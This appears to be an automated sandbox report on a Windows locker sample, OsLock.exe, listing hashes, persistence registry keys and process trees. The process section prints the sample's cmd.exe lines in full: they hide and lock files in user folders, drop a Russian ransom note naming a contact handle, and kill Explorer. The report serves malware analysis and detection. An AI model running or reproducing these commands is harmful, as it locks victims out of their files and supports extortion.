Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 09:15
Static task
static1
Behavioral task
behavioral1
Sample
OsLock.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
OsLock.exe
Resource
win10v2004-20241007-en
General
-
Target
OsLock.exe
-
Size
385KB
-
MD5
675ea787630f596da0474830ffb49723
-
SHA1
c8e18cbc3cca1ded47eb5860a71b9f22d46409e1
-
SHA256
ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf
-
SHA512
fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d
-
SSDEEP
6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe -
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini attrib.exe -
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" -startup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --init" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_1 = "AWindowsService.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_2 = "taskhost.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_4 = "System.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" /setup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --wininit" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_3 = "windowsx-c.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_5 = "_default64.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_6 = "native.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_7 = "ux-cryptor.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_8 = "crypt0rsx.exe" OsLock.exe -
Drops desktop.ini file(s) 45 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Documents\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Searches\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\75GKCLJR\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GUJ7UW2N\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Links\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Videos\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Documents\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GFIGH6G\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Music\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini attrib.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3W44XPEP\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GY8QW6M2\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\L7XNHY48\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini attrib.exe File opened for modification C:\Users\Public\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GKATPXW1\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8O71085\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini attrib.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
pid Process 2732 cmd.exe 2772 cmd.exe 2776 cmd.exe 2824 cmd.exe 2828 cmd.exe 2868 cmd.exe -
Kills process with taskkill 1 IoCs
pid Process 2848 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1872 OsLock.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1872 OsLock.exe Token: SeDebugPrivilege 2848 taskkill.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 1872 wrote to memory of 2732 1872 OsLock.exe 31 PID 1872 wrote to memory of 2732 1872 OsLock.exe 31 PID 1872 wrote to memory of 2732 1872 OsLock.exe 31 PID 1872 wrote to memory of 2772 1872 OsLock.exe 32 PID 1872 wrote to memory of 2772 1872 OsLock.exe 32 PID 1872 wrote to memory of 2772 1872 OsLock.exe 32 PID 1872 wrote to memory of 2776 1872 OsLock.exe 33 PID 1872 wrote to memory of 2776 1872 OsLock.exe 33 PID 1872 wrote to memory of 2776 1872 OsLock.exe 33 PID 1872 wrote to memory of 2824 1872 OsLock.exe 34 PID 1872 wrote to memory of 2824 1872 OsLock.exe 34 PID 1872 wrote to memory of 2824 1872 OsLock.exe 34 PID 1872 wrote to memory of 2828 1872 OsLock.exe 35 PID 1872 wrote to memory of 2828 1872 OsLock.exe 35 PID 1872 wrote to memory of 2828 1872 OsLock.exe 35 PID 1872 wrote to memory of 2868 1872 OsLock.exe 36 PID 1872 wrote to memory of 2868 1872 OsLock.exe 36 PID 1872 wrote to memory of 2868 1872 OsLock.exe 36 PID 1872 wrote to memory of 2848 1872 OsLock.exe 37 PID 1872 wrote to memory of 2848 1872 OsLock.exe 37 PID 1872 wrote to memory of 2848 1872 OsLock.exe 37 PID 2732 wrote to memory of 2924 2732 cmd.exe 45 PID 2732 wrote to memory of 2924 2732 cmd.exe 45 PID 2732 wrote to memory of 2924 2732 cmd.exe 45 PID 2868 wrote to memory of 1632 2868 cmd.exe 46 PID 2868 wrote to memory of 1632 2868 cmd.exe 46 PID 2868 wrote to memory of 1632 2868 cmd.exe 46 PID 2776 wrote to memory of 2764 2776 cmd.exe 47 PID 2776 wrote to memory of 2764 2776 cmd.exe 47 PID 2776 wrote to memory of 2764 2776 cmd.exe 47 PID 2824 wrote to memory of 2800 2824 cmd.exe 48 PID 2824 wrote to memory of 2800 2824 cmd.exe 48 PID 2824 wrote to memory of 2800 2824 cmd.exe 48 PID 2772 wrote to memory of 2796 2772 cmd.exe 49 PID 2772 wrote to memory of 2796 2772 cmd.exe 49 PID 2772 wrote to memory of 2796 2772 cmd.exe 49 PID 2732 wrote to memory of 2680 2732 cmd.exe 50 PID 2732 wrote to memory of 2680 2732 cmd.exe 50 PID 2732 wrote to memory of 2680 2732 cmd.exe 50 PID 2828 wrote to memory of 2624 2828 cmd.exe 51 PID 2828 wrote to memory of 2624 2828 cmd.exe 51 PID 2828 wrote to memory of 2624 2828 cmd.exe 51 PID 2776 wrote to memory of 2636 2776 cmd.exe 52 PID 2776 wrote to memory of 2636 2776 cmd.exe 52 PID 2776 wrote to memory of 2636 2776 cmd.exe 52 PID 2772 wrote to memory of 2656 2772 cmd.exe 53 PID 2772 wrote to memory of 2656 2772 cmd.exe 53 PID 2772 wrote to memory of 2656 2772 cmd.exe 53 PID 2824 wrote to memory of 2688 2824 cmd.exe 54 PID 2824 wrote to memory of 2688 2824 cmd.exe 54 PID 2824 wrote to memory of 2688 2824 cmd.exe 54 PID 2828 wrote to memory of 2748 2828 cmd.exe 55 PID 2828 wrote to memory of 2748 2828 cmd.exe 55 PID 2828 wrote to memory of 2748 2828 cmd.exe 55 PID 2868 wrote to memory of 2852 2868 cmd.exe 56 PID 2868 wrote to memory of 2852 2868 cmd.exe 56 PID 2868 wrote to memory of 2852 2868 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 12 IoCs
pid Process 2764 attrib.exe 1632 attrib.exe 2924 attrib.exe 2800 attrib.exe 2796 attrib.exe 2636 attrib.exe 2656 attrib.exe 2688 attrib.exe 2680 attrib.exe 2624 attrib.exe 2748 attrib.exe 2852 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\OsLock.exe"C:\Users\Admin\AppData\Local\Temp\OsLock.exe"1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cmd.execmd.exe /c F: & attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2924
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2680
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2796
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2656
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2764
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2636
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2800
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2688
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2624
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2748
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops startup file
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1632
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2852
-
-
-
C:\Windows\system32\taskkill.exetaskkill.exe /im Explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6B
MD5c2ddb87fcd81f868895dc5e4cce00702
SHA190d6c9d00c574088776887f3863a849233856333
SHA256c27e7902281a66630c499d0d7c1013f0cb17a7f5ea333ab35fde73d6e5d8ac36
SHA5123407ae2d3caa0928b1f3fb7b6e48856dfc6048f8f55eb2502abee0aa0196e373eb2cdc840a10b79f80edb79d5db021ed7f7ca93ca2aff4c016d0de1f2ef84b49
-
Filesize
56B
MD55250167e9ed5616c92f2c49b7e295375
SHA16ca4f968809543f95a7c476bf39a9000231a4a4e
SHA2560a8ce0b30dffe9ca968d05f8067a017bc48e0f5a432d75b4b7d25d59ad58a40d
SHA512df65c59ba2c3b5033b85c4a526957c0ecd508acb2222b95133fa574df7a77abd3007a682d56312357e3ace87b88bd386c5463884d2c28c184808cf7c0608aeec